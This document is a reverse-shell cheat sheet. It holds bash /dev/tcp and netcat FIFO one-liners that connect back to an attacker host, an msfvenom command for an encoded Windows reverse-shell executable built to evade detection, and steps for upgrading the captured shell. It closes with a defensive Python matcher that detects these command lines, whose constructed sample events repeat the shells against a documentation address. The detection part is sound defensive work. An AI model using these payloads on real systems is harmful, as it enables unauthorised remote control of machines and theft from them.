# Reverse Shell

## One-Liners

#### Bash

```bash
bash -i >& /dev/tcp/<IP>/<port> 0>&1
```

#### Netcat

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <port> >/tmp/f
```

Sometimes one one-liner won't work, but another will. Two great cheatsheets are [pentestmonkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) and [highoncoffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/).

## Generate Payload

### Msfvenom

#### Windows reverse shell with encoder

```bash
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<Your IP> LPORT=<Listening Port> -f exe -o <Shell Name>.exe
```

## Shell Cushions

If the reverse shell is terminal-based, some measures can be taken to make it more comfortable to use.

### Spawn TTY

#### Python

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
```

[Additional](https://netsec.ws/?p=337) ways to spawn TTY.

### Auto-Completion

Background the process with Ctrl+z.

Execute this to disable echoing and send I/O straight through without processing.

```bash
stty raw -echo
```

Return to the process with `fg`, then press Enter twice.

[Additional cushions](https://medium.com/bugbountywriteup/pimp-my-shell-5-ways-to-upgrade-a-netcat-shell-ecd551a180d2).
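
The command shapes above are also what a defender looks for in process command-line telemetry. The following is an added example, not part of the original page: a small Python matcher for those shapes. The rule names, hosts, users and sample events are constructed, and 192.0.2.10 is a documentation address.

```python
import re

# Patterns derived from the commands on this page; rule names are hypothetical.
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/[\w.\-:]+/\d+")
INTERACTIVE = re.compile(r"(?:^|\s)-i\b|0[<>]&\d")  # "-i" flag or stdin tied to another fd
# mkfifo X ; ... | sh ... | nc ... > X  (the same FIFO feeds the shell and receives nc output)
FIFO_NC = re.compile(
    r"mkfifo\s+(\S+?)\s*;.*\|\s*(?:/bin/)?(?:ba)?sh\b.*\|\s*(?:nc|ncat|netcat)\b.*>\s*\1"
)
PTY_SPAWN = re.compile(r"python[\d.]*\s+-c\s.*pty\.spawn\(")

def classify(cmdline):
    """Return a list of (rule, severity) hits for one process command line."""
    cmd = " ".join(cmdline.split())  # collapse runs of whitespace
    hits = []
    if DEV_TCP.search(cmd):
        # /dev/tcp is also used for plain port checks, so only the
        # interactive/stdio-redirected form is rated "high".
        hits.append(("bash_dev_tcp", "high" if INTERACTIVE.search(cmd) else "review"))
    if FIFO_NC.search(cmd):
        hits.append(("fifo_netcat_shell", "high"))
    if PTY_SPAWN.search(cmd):
        hits.append(("python_pty_spawn", "review"))
    return hits

# Constructed sample events: (host, user, command line).
SAMPLE_EVENTS = [
    ("web01", "www-data", "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    ("web01", "www-data",
     "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.0.2.10 4444 >/tmp/f"),
    ("web01", "www-data", "python -c 'import pty;pty.spawn(\"/bin/bash\")'"),
    ("db01", "deploy", "timeout 1 bash -c '</dev/tcp/db01/5432'"),  # benign port check
    ("db01", "deploy", "nc -zv db01 5432"),                         # benign port check
    ("ci01", "build", "mkfifo /tmp/build.pipe"),                    # benign FIFO
]

def scan(events):
    """Return one alert dict per rule hit across all events."""
    return [
        {"host": host, "user": user, "rule": rule, "severity": sev, "cmd": cmd}
        for host, user, cmd in events
        for rule, sev in classify(cmd)
    ]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f'{alert["severity"]:6} {alert["rule"]:18} {alert["host"]} {alert["user"]}: {alert["cmd"]}')
```

A service account such as a web server user spawning any of these is the stronger signal; the `review` hits need that context before escalation.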

